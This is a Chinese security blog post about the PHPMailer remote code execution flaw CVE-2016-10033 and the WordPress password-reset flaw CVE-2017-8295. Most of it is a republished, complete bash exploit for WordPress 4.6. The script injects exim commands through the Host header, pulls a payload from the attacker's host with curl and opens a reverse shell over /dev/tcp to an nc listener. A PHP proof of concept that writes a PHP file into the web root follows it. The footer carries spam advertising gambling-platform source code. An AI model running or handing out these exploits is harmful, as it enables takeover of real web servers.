情'Blog 文章列表: [首页] 第2页 第3页 第4页 第5页 第6页 [尾页]


【更新WordPress 4.6漏洞利用PoC】PHPMailer曝远程代码执行高危漏洞

发布日期: 2017-05-05    浏览次数:     文章作者: qing edit

【2017.5.4更新】

昨天曝出了两个比较热门的漏洞,一个是CVE-2016-10033,另一个则为CVE-2017-8295。从描述来看,前者是WordPress Core 4.6一个未经授权的RCE漏洞。

这次漏洞公告就是PHPMailer漏洞利用细节在WordPress核心中的实现。未经授权的攻击者利用漏洞就能实现远程代码执行,针对目标服务器实现即时访问,最终导致目标应用服务器的完全陷落。无需插件或者非标准设置,就能利用该漏洞。实际上Wordfence当时就曾经提到过该漏洞影响到了WP Core。

最新的这则公告提到了PHP mail()函数的新利用向量,可在MTA – Exim4之上利用该漏洞,Exim在如Debian或Ubuntu等系统中都是默认安装的。这样一来也就增加了此类攻击的范围和漏洞的严重性。具体为利用host字段注入了恶意数据,进入到了mail函数,再利用sendmail (实际上是软连接到的exim4)命令的-be 参数来执行命令。

之所以到现在才公布这部分细节,是期望给予WordPress和其它收到影响的软件提供商更多时间来升级受影响的Mail库。除此之外,也是针对CVE-2017-8295漏洞留出更多的修复时间。

漏洞利用详情参见:https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

影响范围:

本次公告中提到的RCE PoC基于WordPress 4.6实现,不过其它版本的WordPress也可能受到影响。

视频演示PoC:https://www.youtube.com/watch?v=ZFt_S5pQPX0

作者给出的PoC:


#!/bin/bash

#

# __ __ __ __ __

# / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________

# / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/

# / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )

# /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/

# /____/

#

#

# WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit

# CVE-2016-10033

#

# wordpress-rce-exploit.sh (ver. 1.0)

#

#

# Discovered and coded by

#

# Dawid Golunski (@dawid_golunski)

# https://legalhackers.com

#

# ExploitBox project:

# https://ExploitBox.io

#

# Full advisory URL:

# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

#

# Exploit src URL:

# https://exploitbox.io/exploit/wordpress-rce-exploit.sh

#

#

# Tested on WordPress 4.6:

# https://github.com/WordPress/WordPress/archive/4.6.zip

#

# Usage:

# ./wordpress-rce-exploit.sh target-wordpress-url

#

#

# Disclaimer:

# For testing purposes only

#

#

# -----------------------------------------------------------------

#

# Interested in vulns/exploitation?

#

#

# .;lc'

# .,cdkkOOOko;.

# .,lxxkkkkOOOO000Ol'

# .':oxxxxxkkkkOOOO0000KK0x:'

# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.

# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.

# '';ldxxxxxdc,. ,oOXXXNNNXd;,.

# .ddc;,,:c;. ,c: .cxxc:;:ox:

# .dxxxxo, ., ,kMMM0:. ., .lxxxxx:

# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:

# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:

# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:

# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:

# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:

# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:

# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:

# .dxxxxxdl;. ., .. .;cdxxxxxx:

# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:

# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.

# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.

# .':oxxxxxxxxx.ckkkkkkkkxl,.

# .,cdxxxxx.ckkkkkxc.

# .':odx.ckxl,.

# .,.'.

#

# https://ExploitBox.io

#

# https://twitter.com/Exploit_Box

#

# -----------------------------------------------------------------

rev_host="192.168.57.1"

function prep_host_header() {

cmd="$1"

rce_cmd="\${run{$cmd}}";

# replace / with ${substr{0}{1}{$spool_directory}}

#sed 's^/^${substr{0}{1}{$spool_directory}}^g'

rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"

# replace ' ' (space) with

#sed 's^ ^${substr{10}{1}{$tod_log}}$^g'

rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"

#return "target(any -froot@localhost -be $rce_cmd null)"

host_header="target(any -froot@localhost -be $rce_cmd null)"

return 0

}

#cat exploitbox.ans

intro="

DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r

bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f

G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c

G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg

IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f

IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f

X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6

b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb

NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N

TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1

QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz

NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g

G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54

eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb

WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO

TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg

ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb

MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD

G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob

WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz

NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb

MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f

X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4

bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"

intro2="

ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09

fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb

MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg

ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE

aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09

fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg

ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh

bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt

ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt

ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp

bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1

cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="

echo "$intro" | base64 -d

echo "$intro2" | base64 -d

if [ "$#" -ne 1 ]; then

echo -e "Usage:\n$0 target-wordpress-url\n"

exit 1

fi

target="$1"

echo -ne "\e[91m[*]\033[0m"

read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice

echo

if [ "$choice" == "y" ]; then

echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"

echo -e "\e[92m[+]\033[0m Connected to the target"

# Serve payload/bash script on :80

RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"

echo "$RCE_exec_cmd" > rce.txt

python -mSimpleHTTPServer 80 2>/dev/null >&2 &

hpid=$!

# Save payload on the target in /tmp/rce

cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"

prep_host_header "$cmd"

curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword

echo -e "\n\e[92m[+]\e[0m Payload sent successfully"

# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce

cmd="/bin/bash /tmp/rce"

prep_host_header "$cmd"

curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &

echo -e "\n\e[92m[+]\033[0m Payload executed!"

echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"

nc -vv -l 1337

echo

else

echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"

exit 0

fi

echo "Exiting..."

exit 0


上述另外一个最新曝出编号为CVE-2017-8295的漏洞,严重程度被评级为介于Medium和High之间(而非Critical),影响到WordPress Core <= 4.7.4以下的版本。

这个漏洞的概况是这样的:WordPress有个密码重置功能,该特性中存在漏洞——在某些情况下可能导致攻击者在无需身份认证的情况下拿到密码重置链接,这样一来攻击者就能获取目标用户的WordPress账户了。

这个漏洞源于WordPress默认在创建密码重置邮件的时候,采用不受信任的数据。具体的利用方式点击这里查看。目前WordPress官方暂无针对该问题的解决方案,可以采用如下临时解决方案:

用户可启用UserCanonicalName实施静态SERVER_NAME值

https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname

据作者所说,该问题已经向WordPress安全团队进行过多次反馈,最早一次是在去年7月份,但一直没有得到相应的反馈。

【2016.12.27原文】

这次曝出远程代码执行漏洞的是堪称全球最流行邮件发送类的PHPMailer,据说其全球范围内的用户量大约有900万——每天还在持续增多。

GitHub上面形容PHPMailer“可能是全球PHP发送邮件最流行的代码。亦被诸多开源项目所采用,包括WordPress、Drupal、1CRM、Joomla!等”。所以这个漏洞影响范围还是比较广的,漏洞级别也为Critical最高级。

漏洞编码

CVE-2016-10033

影响版本

PHPMailer <  5.2.18

漏洞级别

高危

漏洞描述

独立研究人员Dawid Golunski发现了该漏洞——远程攻击者利用该漏洞,可实现远程任意代码在web服务器账户环境中执行,并使web应用陷入威胁中。攻击者主要在常见的web表单如意见反馈表单,注册表单,邮件密码重置表单等使用邮件发送的组件时利用此漏洞。

不过有关该漏洞的细节信息,研究人员并未披露,期望给予网站管理员更多的时间来升级PHPMailer类,避免受漏洞影响。

漏洞PoC

实际上Dawid Golunski已经做了个可行的RCE PoC,不过会迟一些再发布。关注视频PoC请点击:https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

更新:PoC代码已经公布,请站长们尽快升级!

<?php /* 
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) 
A simple PoC (working on Sendmail MTA) 
It will inject the following parameters to sendmail command: 
Arg no. 0 == [/usr/sbin/sendmail] 
Arg no. 1 == [-t] 
Arg no. 2 == [-i] 
Arg no. 3 == [-fattacker\] 
Arg no. 4 == [-oQ/tmp/] 
Arg no. 5 == [-X/var/www/cache/phpcode.php] 
Arg no. 6 == [some"@email.com] 
which will write the transfer log (-X) into /var/www/cache/phpcode.php file. 
The resulting file will contain the payload passed in the body of the msg: 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306 
09607 <<< Content-Type: text/html; charset=us-ascii 
09607 <<< 
09607 <<< <?php phpinfo(); ?> 09607 <<< 
09607 <<< 
09607 <<< 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306-- 
See the full advisory URL for details. 
*/ // Attacker's input coming from untrusted source such as $_GET , $_POST etc.  // For example from a Contact form  $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com'; 
$msg_body  = "<?php phpinfo(); ?>"; // ------------------  // mail() param injection via the vulnerability in PHPMailer  require_once('class.phpmailer.php'); 
$mail = new PHPMailer(); // defaults to using php "mail()"  $mail->SetFrom($email_from, 'Client Name'); 
$address = "customer_feedback@company-X.com"; 
$mail->AddAddress($address, "Some User"); 
$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033"; 
$mail->MsgHTML($msg_body); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; 
} else { echo "Message sent!\n"; 
}

漏洞修复

更新到5.2.18:https://github.com/PHPMailer/PHPMailer

漏洞详情目前已经提交给了PHPMailer官方——官方也已经发布了PHPMailer 5.2.18紧急安全修复,解决上述问题,受影响的用户应当立即升级。详情可参见:

https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md

https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md


<< 留言评论 >>

本文:【更新WordPress 4.6漏洞利用PoC】PHPMailer曝远程代码执行高危漏洞,来自情'Blog

低价出售:六合彩,时时彩,股票T+0 现金皇冠网,等投注平台源码 另外出售:全讯网,足球比分,直播网,小姐威客网,同城交友 网狐棋牌整站带教程,充气娃娃销售下单源码 联系QQ:33089632

上一篇:WordPress曝未经授权的密码重置漏洞(CVE-2017-8295 ) 下一篇:【顶置任务】仿做一套 棋牌 3端 程序源码 详细请入内 欢迎推荐

点击这里给我发消息

      神刀网      雨路    iick     人生注入点    啊D  sh3llc0de  暗月

           免责申明:

本站开放的目的是收集各种Web漏洞资源,给予代码分析审计人员和脚本安全研究人员的一些学习资料或者参考资料!本网站提供的源码与平台或工具,仅为程序爱好者提供学习交流用,绝不能用做非法用途,任何情况下引触所属地区之法律,网友须自行承担责任,与本站无任何关系与法律风险,所以任何人不得将此用于非法途径!漏洞作者以及本站不承担任何风险!

Copyright© 2010-9999 情'Blog, all right reserved.